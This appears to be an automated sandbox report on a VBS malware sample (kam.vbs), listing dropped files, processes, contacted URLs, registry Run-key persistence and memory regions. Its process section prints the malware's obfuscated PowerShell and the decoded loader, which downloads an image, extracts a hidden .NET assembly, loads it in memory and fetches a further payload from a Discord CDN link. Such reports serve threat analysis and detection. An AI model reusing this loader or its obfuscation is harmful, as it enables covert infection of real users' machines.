Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
kam.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\cognitivo.vbs
|
Unicode text, UTF-8 text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\c2iY1[1].txt
|
ASCII text, with very long lines (12075), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0fz5flur.noa.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_avzzzgbe.r11.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bmnhme0j.zvz.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_clb53lak.cif.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hcfdsidh.szd.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sexmt3mt.pll.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kam.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreCYDgTreNgDgTre4DgTreDkDgTreMQDgTreyDgTreDUDgTreMgDgTrexDgTreGQDgTreOQDgTre1DgTreGUDgTreNQDgTrewDgTreDQDgTreMQDgTreyDgTreGQDgTreMwDgTre1DgTreDUDgTreZDgTreDgTre1DgTreDIDgTreMDgTreBjDgTreGYDgTreZDgTreBlDgTreDIDgTreMQBlDgTreGQDgTreMDgTreBkDgTreDEDgTreZQDgTrexDgTreDUDgTreNgDgTrewDgTreDkDgTreZgBlDgTreDIDgTreMgDgTrezDgTreDMDgTreZgBjDgTreGIDgTreMDgTreDgTre2DgTreDUDgTreMgBmDgTreDQDgTreNwDgTre1DgTreDUDgTreYwBjDgTreGYDgTreYQDgTre9DgTreG0DgTreaDgTreDgTremDgTreGMDgTreZQDgTrexDgTreGQDgTreMDgTreDgTre1DgTreDYDgTreNgDgTre9DgTreHMDgTreaQDgTremDgTreGMDgTreNgDgTrezDgTreDIDgTreMgDgTre1DgTreDYDgTreNgDgTre9DgTreHgDgTreZQDgTre/DgTreHQDgTreeDgTreB0DgTreC4DgTrebQBhDgTreGsDgTreLwDgTre4DgTreDEDgTreMwDgTre4DgTreDQDgTreMQDgTre3DgTreDQDgTreNwDgTreyDgTreDgDgTreNQDgTrewDgTreDIDgTreNgDgTrezDgTreDQDgTreMgDgTrexDgTreC8DgTreMwDgTre0DgTreDYDgTreMQDgTre5DgTreDEDgTreMQDgTrexDgTreDUDgTreMwDgTreyDgTreDDgTreDgTreNwDgTreyDgTreDYDgTreNQDgTrezDgTreDIDgTreMQDgTrevDgTreHMDgTredDgTreBuDgTreGUDgTrebQBoDgTreGMDgTreYQB0DgTreHQDgTreYQDgTrevDgTreG0DgTrebwBjDgTreC4DgTrecDgTreBwDgTreGEDgTreZDgTreByDgTreG8DgTreYwBzDgTreGkDgTreZDgTreDgTreuDgTreG4DgTreZDgTreBjDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGMDgTrebwBnDgTreG4DgTreaQB0DgTreGkDgTredgBvDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreEEDgTrecwBtDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd
= [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe
-windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command
"function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData =
@(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData
+= $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634',
'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks
$links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>';
$endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex
-ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command
= $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly
= [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method
= $type.GetMethod('VAI').Invoke($null, [object[]] ('&68912521d95e50412d355d520cfde21ed0d1e15609fe2233fcb0652f4755ccfa=mh&ce1d0566=si&c6322566=xe?txt.mak/8138417472850263421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth'
, '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\cognitivo.vbs
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\ProgramData\cognitivo.vbs"
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\ProgramData\cognitivo.vbs"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://paste.ee/d/c2iY1
|
188.114.96.3
|
|
|
|
https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634
|
188.114.96.3
|
|
|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
https://uploaddeimagens.com.br
|
unknown
|
|
|
|
https://paste.ee/
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://paste.ee/d/c2iY1h
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://paste.ee/d/c2iY1l
|
unknown
|
||
|
https://www.google.com;
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://analytics.paste.ee
|
unknown
|
||
|
https://paste.ee/d/c2iY18
|
unknown
|
||
|
http://uploaddeimagens.com.br
|
unknown
|
||
|
https://paste.ee/d/c2iY14
|
unknown
|
||
|
https://paste.ee/d/c2iY1t
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://analytics.paste.ee;
|
unknown
|
||
|
https://cdnjs.cloudflare.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://cdnjs.cloudflare.com;
|
unknown
|
||
|
https://cdn.discordapp.com/attachments/1235627023511191643/1243620582747148318/kam.txt?ex=6652236c&is=6650d1ec&hm=afcc5574f2560bcf3322ef90651e1d0de12edfc025d553d21405e59d12521986&
|
162.159.134.233
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://crl.v
|
unknown
|
||
|
https://secure.gravatar.com
|
unknown
|
||
|
https://themes.googleusercontent.com
|
unknown
|
There are 20 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
paste.ee
|
188.114.96.3
|
|
|
|
uploaddeimagens.com.br
|
188.114.96.3
|
|
|
|
cdn.discordapp.com
|
162.159.134.233
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
188.114.96.3
|
paste.ee
|
European Union
|
|
|
|
162.159.134.233
|
cdn.discordapp.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Path
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
E44EAFF000
|
unkown
|
page read and write
|
||
|
185E687F000
|
heap
|
page read and write
|
||
|
1B7D78BA000
|
trusted library allocation
|
page read and write
|
||
|
141D2E8E000
|
heap
|
page read and write
|
||
|
185E93E6000
|
heap
|
page read and write
|
||
|
CEAC7E000
|
stack
|
page read and write
|
||
|
141D307E000
|
heap
|
page read and write
|
||
|
1435A04C000
|
heap
|
page read and write
|
||
|
979AE3E000
|
stack
|
page read and write
|
||
|
185E687D000
|
heap
|
page read and write
|
||
|
25D791F7000
|
heap
|
page execute and read and write
|
||
|
CEB2FB000
|
stack
|
page read and write
|
||
|
1B7D5440000
|
heap
|
page read and write
|
||
|
141D2E83000
|
heap
|
page read and write
|
||
|
1B7D784E000
|
trusted library allocation
|
page read and write
|
||
|
25D1006D000
|
trusted library allocation
|
page read and write
|
||
|
1B7D7A08000
|
trusted library allocation
|
page read and write
|
||
|
7FFD345C0000
|
trusted library allocation
|
page read and write
|
||
|
CEAE7E000
|
stack
|
page read and write
|
||
|
141D2F6E000
|
heap
|
page read and write
|
||
|
185E93B0000
|
heap
|
page read and write
|
||
|
185E8BA0000
|
heap
|
page read and write
|
||
|
141D101D000
|
heap
|
page read and write
|
||
|
185E88FD000
|
heap
|
page read and write
|
||
|
141D11D5000
|
heap
|
page read and write
|
||
|
185E920E000
|
heap
|
page read and write
|
||
|
141D2EC7000
|
heap
|
page read and write
|
||
|
1435D9CD000
|
heap
|
page read and write
|
||
|
7FFD34446000
|
trusted library allocation
|
page execute and read and write
|
||
|
25D77593000
|
heap
|
page read and write
|
||
|
1435BF50000
|
heap
|
page read and write
|
||
|
1435BE84000
|
heap
|
page read and write
|
||
|
141D2F54000
|
heap
|
page read and write
|
||
|
185E8837000
|
heap
|
page read and write
|
||
|
1B7D75B0000
|
trusted library allocation
|
page read and write
|
||
|
141D2F64000
|
heap
|
page read and write
|
||
|
185E85D5000
|
heap
|
page read and write
|
||
|
1435BF47000
|
heap
|
page read and write
|
||
|
185E93EF000
|
heap
|
page read and write
|
||
|
25D10011000
|
trusted library allocation
|
page read and write
|
||
|
13F94390000
|
heap
|
page read and write
|
||
|
185E9268000
|
heap
|
page read and write
|
||
|
1B7D5410000
|
heap
|
page read and write
|
||
|
1435A0F5000
|
heap
|
page read and write
|
||
|
141D2E80000
|
heap
|
page read and write
|
||
|
185E6895000
|
heap
|
page read and write
|
||
|
185E93C9000
|
heap
|
page read and write
|
||
|
25D00047000
|
trusted library allocation
|
page read and write
|
||
|
141D2F79000
|
heap
|
page read and write
|
||
|
1435BFC3000
|
heap
|
page read and write
|
||
|
185E8DB0000
|
trusted library allocation
|
page read and write
|
||
|
E44ECFE000
|
stack
|
page read and write
|
||
|
7FFD34590000
|
trusted library allocation
|
page read and write
|
||
|
141D2EF5000
|
heap
|
page read and write
|
||
|
1435C05C000
|
heap
|
page read and write
|
||
|
2F0C3FF000
|
stack
|
page read and write
|
||
|
185E6805000
|
heap
|
page read and write
|
||
|
7FFD344E0000
|
trusted library allocation
|
page read and write
|
||
|
25D794C7000
|
heap
|
page read and write
|
||
|
185E687D000
|
heap
|
page read and write
|
||
|
1B7D7262000
|
heap
|
page read and write
|
||
|
1435BE69000
|
heap
|
page read and write
|
||
|
141D2EB8000
|
heap
|
page read and write
|
||
|
1B7D7313000
|
heap
|
page read and write
|
||
|
141D2F64000
|
heap
|
page read and write
|
||
|
1B7D74D6000
|
trusted library allocation
|
page read and write
|
||
|
1435BE73000
|
heap
|
page read and write
|
||
|
185E93BE000
|
heap
|
page read and write
|
||
|
141D2F6C000
|
heap
|
page read and write
|
||
|
141D2F81000
|
heap
|
page read and write
|
||
|
185E88FF000
|
heap
|
page read and write
|
||
|
1435A0EA000
|
heap
|
page read and write
|
||
|
185E883D000
|
heap
|
page read and write
|
||
|
7FFD34550000
|
trusted library allocation
|
page execute and read and write
|
||
|
185E88C1000
|
heap
|
page read and write
|
||
|
25D775AD000
|
heap
|
page read and write
|
||
|
7FFD34660000
|
trusted library allocation
|
page read and write
|
||
|
185E8633000
|
heap
|
page read and write
|
||
|
141D1001000
|
heap
|
page read and write
|
||
|
141D0FF1000
|
heap
|
page read and write
|
||
|
979AFBC000
|
stack
|
page read and write
|
||
|
25D79550000
|
heap
|
page read and write
|
||
|
1435A0C2000
|
heap
|
page read and write
|
||
|
979AA7E000
|
stack
|
page read and write
|
||
|
141D0FF1000
|
heap
|
page read and write
|
||
|
1435BF4B000
|
heap
|
page read and write
|
||
|
1B7D7240000
|
heap
|
page read and write
|
||
|
13F941E0000
|
heap
|
page read and write
|
||
|
141D2F67000
|
heap
|
page read and write
|
||
|
13FA62AD000
|
trusted library allocation
|
page read and write
|
||
|
185E8828000
|
heap
|
page read and write
|
||
|
25D796E0000
|
heap
|
page read and write
|
||
|
E44EEBF000
|
stack
|
page read and write
|
